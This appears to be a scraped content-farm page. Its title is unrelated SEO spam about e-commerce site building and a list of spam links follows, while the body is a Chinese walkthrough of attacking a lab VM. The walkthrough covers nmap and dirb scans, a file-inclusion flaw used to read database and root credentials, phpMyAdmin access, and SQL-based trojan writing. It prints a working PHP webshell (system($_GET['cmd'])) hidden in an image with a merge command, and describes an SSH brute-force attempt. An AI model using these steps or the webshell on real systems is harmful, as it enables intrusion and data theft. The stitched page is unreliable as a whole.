当前位置: 首页 > news >正文

电子商务网站建设成果ppy营销背景包括哪些内容

电子商务网站建设成果ppy,营销背景包括哪些内容,上海的公司地址,详情页制作一、信息收集 1、探测内网主机IP可以使用各种扫描工具比如nmap,我这里用的是自己编写的。 nmap -n 192.168.12.0/24 #扫描IP,发现目标主机 2、先不着急,先收集一波它的端口(无果) nmap -n 192.168.12.136 -p 1-10000…

一、信息收集

1、探测内网主机IP可以使用各种扫描工具比如nmap,我这里用的是自己编写的。

nmap -n 192.168.12.0/24  #扫描IP,发现目标主机

2、先不着急,先收集一波它的端口(无果)

 nmap -n 192.168.12.136 -p 1-10000  #可以看到它只有22个80

3、进入web界面查看

不错,我也是海迷!这个界面说的sql注入,尝试一番后无果,果断跳过。继续收集信息。

4、扫描路径dirb

 http://192.168.12.136/in

路径中有phpinfo()

我们可以看到,有文件包含

http://192.168.12.136/test

这个界面存在文件包含

 利用这个漏洞读取一波文件

通过一波搜索找到  c.php  文件为它的数据库文件连接信息

使用文件包含来把c.php直接下载下来

代码如下

 直接登录phpmyadmin目录直接查看数据库

二、信息利用

1、获取了数据库账号和密码,直接登录phpmyadmin目录直接查看数据库数据

查找http://192.168.12.136/phpMyAdmin目录,在尝试几次后,人品爆发,找到了

http://192.168.12.136/phpmy/index.php 

 完成拖库!!

 进入界面

2、文件下载利用——默认的配置文config.inc.php,应该和phpMyAdmin/index.php在同一级目录下。尝试下载

config.inc.php的内容。说实话这个东西一般人也发现不了,而且配置信息也不会这样写。

通过这个账号密码可以直接登录root用户

3、上传图片马,上传图片马的时候一定要注意,

图片原始的内容!!!!

像图片中带有 <? 这种符号的会直接影响我们的php木马的结构,导致比如system和eval无法执行。

 ①木马内容:

#@#$

GIF89a


<?php system($_GET['cmd']); ?>


#@#$

②使用cmd与png进行合并:

                copy 111.png/b + 1.php/a 555.png

③上传图片,然后使用

4、直接使用sql语句来植入木马

        1、查看sql权限可以看到,允许任意文件读取和写入。

 

六、它还开启了22号端口,那么直接把它的/etc/passwd下载下来,进行尝试爆破(无果)

http://www.ds6.com.cn/news/94595.html

相关文章:

  • 石家庄网站建设价格深圳营销策划公司十强
  • dreamweaver个人网站推广费用一般多少
  • 网站建设文献翻译网站搜索优化价格
  • 舟山市建设局网站网站制作流程
  • 微信公众号推广网站腾讯广告联盟
  • 网站开发服务纠纷seo网址超级外链工具
  • 萧山建设有限公司网站上海关键词排名推广
  • 企业文化内容范本seo的主要工作内容
  • 宁波做微信网站新网站如何推广
  • 建设银行北京分行网站长沙疫情最新消息
  • 网站建设预览济南最新消息
  • 哪个网站可以接做美工的活儿百度客服中心人工电话
  • 广东省自然资源厅领导分工seo公司杭州
  • 网站交互方式百度网盘seo优化
  • 做类似返利网的网站有哪些网络建站工作室
  • 无锡锡山网站建设制作一个网站需要多少费用
  • 北京市城乡建设委员会门户网站关键词seo优化排名公司
  • 深圳网站建设智能小程序软文街官网
  • 做简历哪个网站比较好百度客服人工在线咨询
  • 网站的锚点链接怎么做免费网站生成器
  • 网站建设得缺点html网页制作代码
  • 网站建设金手指排名信誉推推蛙seo
  • 哪个网站做网销更好深圳外贸网络推广渠道
  • 电子商务网站建设与管理的实践报告西地那非片能延时多久每次吃多少
  • web网站设计分辨率竞价账户托管的公司有哪些
  • 找人做网站被骗 公安不管企业网站seo
  • 一个可以看qq空间的网站互联网销售包括哪些
  • 学做网站论坛会员账号百度seo优化教程
  • 在虚拟主机上建设多个网站运营推广怎么做
  • 语言可以做网站吗东莞网站设计排行榜